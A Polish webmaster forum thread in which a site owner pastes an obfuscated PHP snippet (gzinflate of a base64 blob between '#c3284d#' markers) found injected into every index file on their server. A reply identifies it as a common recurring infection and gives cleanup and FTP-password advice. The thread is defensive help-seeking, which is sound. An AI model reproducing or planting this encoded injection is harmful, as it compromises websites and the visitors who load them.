Wirus? Opcje

[R0ckY]

Witam, z takim oto kodem spotkałem się gdy google przysłało mi maila o zainfekowanych plikach na serwerze.

[PHP] pobierz, plaintext 
#c3284d#
echo(gzinflate(base64_decode("hVTLdpswEP2WsojAshQkAihV1C78CV1yvPADG04SgxGtT/DJv1dPwDlJu5AY5nHnzkijJ7nr6rb/0Xdv1zPetG152q+q+mUfnmEQRPx9t+l3VXi+RNdKoJjQ+5QPgwAbAMEL4AcBDp0SG7Ve1VpVSgeVuVsB/q5Bt+VxW4q2a/qmf2tLD7h9SI57GV011vAHYPl7K/suJDRBhNIIDgOXUhRrjRZWd3fDEP0Ezb4E34OAX0Rf1ZKX4lIcxkiig9b8JAqU4CRPl+qj9hynS4aZkb
T2EWdUa/SeO9mo02VsBWZ2YyDUWqxjvESxUVHsjTn2zrn5n+MioizJZNcitRaTiRlos5Re45vUsSM7xlFfAMMTp9
xnfLSRY33eNRsBPYkpwutswZqIo6Qoswl6XsyceIp9m9gM0HsaQiOcTZRPfZiX4gFcTvahQZ5u5nLY0BH
6X72fdc153NC7OQacfwJtAadjZt7zlqAt7uYWfdYFNjrN0Iz3HI586NzU4dx1mH3lT+3mj/z/l9MEuOvsL7UbmnF21PA1XViLDFFE9OKIZBTW3wRFlNcQRtdnUes5lRL+6rv6dCyCQ9e8BjBYVeoJUPMa
rENEFg+LahGmkCxOxfM6Uq9KGUqpPk/37vn5Cw==")));
#/c3284d#
[PHP] pobierz, plaintext 

Wie ktoś może, czego to jest zasługa, że każdy plik index (nie tylko) dostał coś takiego i "zawirusował" stronę?
Będzie konieczny reinstal, czy to po prostu robota jakiegoś robaczka ze strony komputera, na którym logował eis jakiś user do FTP.

Wszystkie konta FTP wyłączone, więc mam nadzieje problemu nie będzie.
Jeżeli to zły dział, to proszę o przeniesienie i dzięki za odpowiedzi.

Spotkał ktoś się kiedyś z czymś podobnym?

[tehaha]

Tak to jest wirus, dość popularny problem i generalnie dość upierdliwy bo potrafi nawracać. Musisz wyczyścić wszystkie pliki z tego kodu, a następnie zmienić hasła do ftp. Jeżeli masz taką możliwość to usuń pliki z serwera i wgraj jeszcze raz. Jak już to zrobisz to w Narzędziach dla webmastera Google zgłaszasz stronę do ponownego przeglądu, żeby została usunięta z czarnej listy.

Jeżeli używasz Total Commander'a do łączenia z ftp to bardzo możliwe, że to jego zasługa bo, któraś tam wersja miała dziurę i hasła wyciekały. W takim przypadku usuń go i zainstaluj coś lepszego np. FileZilla albo WinSCP.